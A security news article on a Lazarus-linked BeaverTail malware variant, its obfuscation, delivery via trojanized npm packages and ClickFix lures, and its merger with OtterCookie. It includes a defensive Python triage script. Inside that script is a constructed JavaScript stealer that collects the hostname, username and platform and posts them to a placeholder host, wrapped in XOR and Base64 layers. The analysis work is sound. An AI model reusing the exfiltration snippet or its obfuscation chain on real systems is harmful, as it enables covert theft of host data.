
New BeaverTail Malware Variant Linked to Lazarus Group

A newly observed variant of the BeaverTail malware has been tied to hackers associated with North Korea. The findings come from Darktrace’s latest report, The State of Cybersecurity, which links BeaverTail activity to DPRK threat clusters assessed to be part of the Lazarus Group. Targets have included cryptocurrency traders, developers, and retail employees, consistent with motivations spanning financial gain and espionage.

The JavaScript-based malware functions as both an information stealer and a loader, harvesting system details before attempting to retrieve additional payloads from remote servers. Darktrace noted that its continued evolution highlights how supply chain compromise remains a persistent concern for the finance sector.

Recent samples show heavier obfuscation and more diverse delivery methods. A BeaverTail file from November 2025, identified as an obfuscated JavaScript package, used layered Base64 and XOR encoding to conceal its behavior. Once executed, it collected hostnames, usernames, and platform data and attempted to contact a command-and-control (C2) server to fetch follow-on malware, the role BeaverTail has historically played in deploying the InvisibleFerret backdoor.
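As an added illustration of the static triage a defender might run on a suspicious npm package (example code, not from Darktrace or the report), the script below peels nested Base64 and single-byte XOR layers and then flags the host-fingerprinting and network calls in whatever emerges. The payload, the XOR key, and the host c2.invalid are constructed for the demo, and the Base64/XOR heuristic is an assumption about the obfuscation chain rather than the sample's actual scheme.

```python
import base64
import re
# Constructed stand-in for a BeaverTail-style stealer payload (not a real sample): it reads the
# hostname, username and platform through Node's os module and posts them to a placeholder host.
INNER = (b"const os=require('os');const https=require('https');\nconst info={h:os.hostname(),"
         b"u:os.userInfo().username,p:os.platform()};\nhttps.request({host:'c2.invalid',"
         b"method:'POST'}).end(JSON.stringify(info));\n")
FINGERPRINT_APIS = (b"os.hostname", b"os.userInfo", b"os.platform", b"process.platform")
NETWORK_APIS = (b"http.request", b"https.request", b"axios", b"fetch(")
JS_MARKERS = (b"require(", b"function", b"atob(", b"eval(")
B64_RE = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")  # a Base64 run long enough to be a payload

def build_sample(key: int = 0xA7) -> bytes:
    """Wrap INNER in single-byte XOR, then two Base64 layers (a constructed obfuscation chain)."""
    xored = bytes(b ^ key for b in INNER)
    layer1 = b'eval(x(atob("' + base64.b64encode(xored) + b'")))'
    return b'eval(atob("' + base64.b64encode(layer1) + b'"))'

def looks_like_js(buf: bytes) -> bool:
    """Mostly printable ASCII and carrying at least one JavaScript marker."""
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in buf)
    return bool(buf) and printable / len(buf) > 0.95 and any(m in buf for m in JS_MARKERS)

def try_xor(buf: bytes) -> "tuple[int, bytes] | None":
    """Brute-force a single-byte XOR key; accept only a key that yields JavaScript-looking text."""
    for key in range(1, 256):
        out = bytes(b ^ key for b in buf)
        if looks_like_js(out):
            return key, out
    return None

def peel(sample: bytes, max_depth: int = 16) -> dict:
    """Peel nested Base64 / XOR layers and report which fingerprinting and network APIs appear."""
    layers, cur = [], sample
    for _ in range(max_depth):
        if not (m := B64_RE.search(cur)):
            break
        try:
            decoded = base64.b64decode(m.group(0), validate=True)
        except ValueError:  # not valid Base64 after all (binascii.Error subclasses ValueError)
            break
        if looks_like_js(decoded):
            layers.append("base64")
        elif (found := try_xor(decoded)) is not None:
            layers.append(f"base64+xor(0x{found[0]:02x})")
            decoded = found[1]
        else:
            break
        cur = decoded
    return {"layers": layers, "final": cur.decode("latin-1"),
            "fingerprint": [a.decode() for a in FINGERPRINT_APIS if a in cur],
            "network": [a.decode() for a in NETWORK_APIS if a in cur]}
```

A non-empty `layers` list combined with hits in both `fingerprint` and `network` is the pattern worth escalating; a single Base64 layer on its own is common in benign minified code.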

BeaverTail has been distributed through multiple channels that exploit trust in common development workflows: Trojanized npm packages that remained available long enough to be downloaded thousands of times; fake job interview platforms posing as technical assessments or conferencing tools; and ClickFix lures that prompt users to run operating system commands that silently download malware.

These techniques are particularly relevant to financial institutions where developers, traders, and analysts often rely on open-source tools and collaboration platforms.

Since 2022, the malware has developed into a modular, cross-platform framework capable of running on Windows, macOS, and Linux systems. It can be delivered as compiled executables, evade detection through dynamic headers and decoy payloads, and enable extensive surveillance. Features observed include keylogging, screenshot capture, and clipboard monitoring aimed at stealing cryptocurrency wallet data and credentials.

In 2025, researchers observed BeaverTail being merged with another DPRK-linked strain known as OtterCookie. This combined toolset adds browser profile enumeration, enhanced wallet targeting, and remote access through legitimate tools like AnyDesk. Jason Soroko, senior fellow at Sectigo, commented, “Darktrace’s identification of a hyper-obfuscated BeaverTail variant marks a significant escalation in tradecraft, transforming a lightweight stealer into a signature-evasive framework shielded by over 128 layers of concealment.” He added, “This technical maturation culminates in the strategic convergence of BeaverTail with the OtterCookie strain, yielding a unified, cross-platform instrument designed for persistent financial theft and surveillance across Windows, macOS, and Linux environments.”


This post is licensed under CC BY 4.0 by the author.